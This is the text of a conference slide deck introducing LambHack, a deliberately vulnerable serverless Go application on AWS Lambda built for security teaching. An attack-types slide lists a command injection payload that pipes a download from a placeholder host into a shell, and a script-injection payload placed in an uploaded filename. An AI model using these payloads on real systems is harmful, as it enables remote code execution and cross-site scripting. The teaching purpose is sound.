LambHack is a vulnerable serverless application written in golang in AWS Lambda running on the Go Sparta Serverless Framework. This talk focuses on how application security still has tons of meaning in serverless.
Talk from 12 Clouds of Christmas at Cloud Austin.
2. CLOUD AUSTIN @WICKETT
Development of highly-resilient,
distributed systems is now
easier than ever with serverless,
however application security is
more important than ever
before.
WHY IT MATTERS
3. CLOUD AUSTIN @WICKETT
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR DEVOPS FUNDAMENTALS AT
LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND
LABS.SIGNALSCIENCES.COM
JAMES WICKETT
4. CLOUD AUSTIN @WICKETT
Serverless encourages functions as
deploy units and run as one-time*,
read-only containers*, coupled with
third party services that allow running
end-to-end applications without
worrying about system operation.
SERVERLESS DEFINITION
* - there is container reuse and writability
15. CLOUD AUSTIN @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS
RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS
GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
16. CLOUD AUSTIN @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A
QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED
AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
18. CLOUD AUSTIN @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN
BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH
A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER
AWS SERVICES YOUR APP CONSUMES
GO SPARTA
19. CLOUD AUSTIN @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
20. CLOUD AUSTIN @WICKETT
lambhack is a vulnerable
serverless lambda application
It would certainly be a bad idea
to base any coding patterns off
what you see here.
33. CLOUD AUSTIN @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending ‘curl evil.com | bash’
‣ Add <script>alert(1)</script> to a filename you
upload on s3
TYPES OF ATTACKS
34. CLOUD AUSTIN @WICKETT
Development of highly-resilient,
distributed systems is now
easier than ever with serverless,
however application security is
more important than ever
before.
WHY IT MATTERS
35. CLOUD AUSTIN @WICKETT
WANT THE SLIDES RIGHT
NOW OR HAVE QUESTIONS?
Send an email to
james@signalsciences.com